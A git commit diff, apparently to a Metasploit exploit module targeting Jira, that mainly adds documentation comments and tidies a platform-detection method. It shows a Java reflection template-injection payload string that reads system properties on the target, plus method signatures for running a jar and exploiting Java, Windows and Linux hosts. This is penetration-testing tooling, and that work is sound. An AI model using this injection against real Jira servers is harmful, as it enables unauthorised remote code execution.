bug/bundler_fix
wchen-r7 2015-12-03 14:25:01 -06:00
parent f33e63c16f
commit 67edf88c39
1 changed files with 45 additions and 5 deletions

View File

@ -294,15 +294,15 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Returns the target platform.
#
# @param cookie [String] Jira cookie
# @return [String]
def get_target_platform(cookie) def get_target_platform(cookie)
c = get_os_detection_code c = get_os_detection_code
res = inject_template(c, cookie) res = inject_template(c, cookie)
json = res.get_json_document json = res.get_json_document
if json['message'] json['message'] || ''
return json['message']
end
nil
end end
@ -320,26 +320,44 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Returns the Java code that gives us the remote Java home path.
#
# @return [String]
def get_java_path_code def get_java_path_code
get_java_property_code('java.home') get_java_property_code('java.home')
end end
# Returns the OS/platform information.
#
# @return [String]
def get_os_detection_code def get_os_detection_code
get_java_property_code('os.name') get_java_property_code('os.name')
end end
# Returns the temp path for Java.
#
# @return [String]
def get_temp_path_code def get_temp_path_code
get_java_property_code('java.io.tmpdir') get_java_property_code('java.io.tmpdir')
end end
# Returns a system property for Java.
#
# @param prop [String] Name of the property to retrieve.
# @return [String]
def get_java_property_code(prop) def get_java_property_code(prop)
%Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() |
end end
# Returns the Java code to execute a jar file.
#
# @param java_path [String] Java home path
# @param war_path [String] The jar file to execute
# @return [String]
def get_jar_exec_code(java_path, war_path) def get_jar_exec_code(java_path, war_path)
# A quick way to check platform insteaf of actually grabbing os.name in Java system properties. # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
if /^\/[[:print:]]+/ === war_path if /^\/[[:print:]]+/ === war_path
@ -436,6 +454,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Checks if the target os/platform is compatible with the module target or not.
#
# @return [TrueClass] Compatible
# @return [FalseClass] Not compatible
def target_platform_compat?(target_platform) def target_platform_compat?(target_platform)
target.platform.names.each do |n| target.platform.names.each do |n|
if /^java$/i === n || /#{n}/i === target_platform if /^java$/i === n || /#{n}/i === target_platform
@ -460,6 +482,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Returns a temp path from the remote target.
#
# @param cookie [String] Jira cookie
# @return [String]
def get_tmp_path(cookie) def get_tmp_path(cookie)
c = get_temp_path_code c = get_temp_path_code
res = inject_template(c, cookie) res = inject_template(c, cookie)
@ -467,6 +493,11 @@ class Metasploit3 < Msf::Exploit::Remote
json['message'] || '' json['message'] || ''
end end
# Returns the Java home path used by Jira.
#
# @param cookie [String] Jira cookie.
# @return [String]
def get_java_home_path(cookie) def get_java_home_path(cookie)
c = get_java_path_code c = get_java_path_code
res = inject_template(c, cookie) res = inject_template(c, cookie)
@ -475,6 +506,9 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Exploits the target in Java platform.
#
# @return [void]
def exploit_as_java(cookie) def exploit_as_java(cookie)
tmp_path = get_tmp_path(cookie) tmp_path = get_tmp_path(cookie)
@ -503,6 +537,9 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Exploits the target in Windows platform.
#
# @return [void]
def exploit_as_windows(cookie) def exploit_as_windows(cookie)
tmp_path = get_tmp_path(cookie) tmp_path = get_tmp_path(cookie)
@ -531,6 +568,9 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Exploits the target in Linux platform.
#
# @return [void]
def exploit_as_linux(cookie) def exploit_as_linux(cookie)
tmp_path = get_tmp_path(cookie) tmp_path = get_tmp_path(cookie)